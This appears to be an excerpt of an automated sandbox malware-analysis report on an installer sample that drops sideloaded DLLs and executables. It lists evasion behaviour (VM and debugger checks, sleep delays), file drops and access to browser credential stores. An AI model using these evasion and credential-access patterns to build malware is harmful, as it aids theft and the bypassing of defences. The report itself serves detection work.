Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58314 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1525283070.000000006C0C1000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1587284521.000000006B0A1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1525430639.000000006C311000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1587494313.000000006B161000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statez source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State> source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "winload_prod.pdbk source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2538008973.00000000004FF000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1527099049.000000006CFB1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1590096177.000000006BE01000.00000020.00000001.01000000.00000011.sdmp
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kXzODlqJak.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D0B530E
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Ascidian.dll.2.drStatic PE information: real checksum: 0x77117 should be: 0x7ccd7
Source: QtCore4.dll.3.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: pfce.5.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: morvrstbj.11.drStatic PE information: real checksum: 0x26dceb should be: 0x26a793
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: kXzODlqJak.exeStatic PE information: section name: .didat
Source: kXzODlqJak.exeStatic PE information: section name: .wixburn
Source: kXzODlqJak.exe.0.drStatic PE information: section name: .didat
Source: kXzODlqJak.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.drStatic PE information: section name: Shared
Source: pfce.5.drStatic PE information: section name: .xdata
Source: pfce.5.drStatic PE information: section name: sfdel
Source: morvrstbj.11.drStatic PE information: section name: .xdata
Source: morvrstbj.11.drStatic PE information: section name: sfdel
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094CAD3 push ecx; ret 0_2_0094CAE6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F8CAD3 push ecx; ret 2_2_00F8CAE6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D074910 push ebp; retf 2_2_6D07491B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A8405 push ecx; ret 2_2_6D0A8418
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A47B4 push ecx; ret 2_2_6D0A47C7
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D0CC5 push ecx; ret 3_2_6C0D0CD8
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0DB658 push ecx; ret 3_2_6C0DB66B
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\pfceJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeFile created: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\morvrstbjJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\StarBurn.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PFCE
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\MORVRSTBJ
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,3_2_6C11A3DD
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BF47945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BF43B54
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BD37C44
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BD37945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BD33B54
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pfceJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeDropped PE file which has not been started: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\Ascidian.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\morvrstbjJump to dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\kXzODlqJak.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-48700
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\kXzODlqJak.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-49882
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeAPI coverage: 5.9 %
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe TID: 2212Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6320Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7952Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0093A8A0h0_2_0093A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0093A899h0_2_0093A805
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00F7A8A0h2_2_00F7A805
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7A805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00F7A899h2_2_00F7A805
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E5C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_008E5C81
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00931290 FindFirstFileExW,0_2_00931290
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094343B FindFirstFileW,FindClose,0_2_0094343B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FE72A FindFirstFileW,FindNextFileW,FindClose,0_2_008FE72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F71290 FindFirstFileExW,2_2_00F71290
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F8343B FindFirstFileW,FindClose,2_2_00F8343B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3E72A FindFirstFileW,FindNextFileW,FindClose,2_2_00F3E72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F25C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00F25C81
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D0A0D44
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0534 _memset,FindFirstFileW,FindClose,2_2_6D0A0534
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D07B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D07B005
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0772FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D0772FA
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C11CC23
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C11C8FD
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0E81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C0E81A1
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094C535 VirtualQuery,GetSystemInfo,0_2_0094C535
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1503561199.000000000AC39000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000004.00000002.1588921227.000000006BAEF000.00000008.00000001.01000000.00000013.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/Ek
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2614840586.0000000000663000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: RescueCDBurner.exe, 00000003.00000002.1526661627.000000006CC9F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/`l
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2614840586.0000000000663000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000003.00000003.1503561199.000000000AC39000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1526661627.000000006CC9F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000004.00000002.1588921227.000000006BAEF000.00000008.00000001.01000000.00000013.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\kXzODlqJak.exeAPI call chain: ExitProcess graph end nodegraph_0-48919
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0092D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092D3EE
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D0B530E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E540B GetProcessHeap,RtlAllocateHeap,0_2_008E540B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00927142 SetUnhandledExceptionFilter,0_2_00927142
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00926B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00926B18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00926FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00926FAF
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F67142 SetUnhandledExceptionFilter,2_2_00F67142
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F6D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F6D3EE
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F66B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F66B18
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F66FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F66FAF
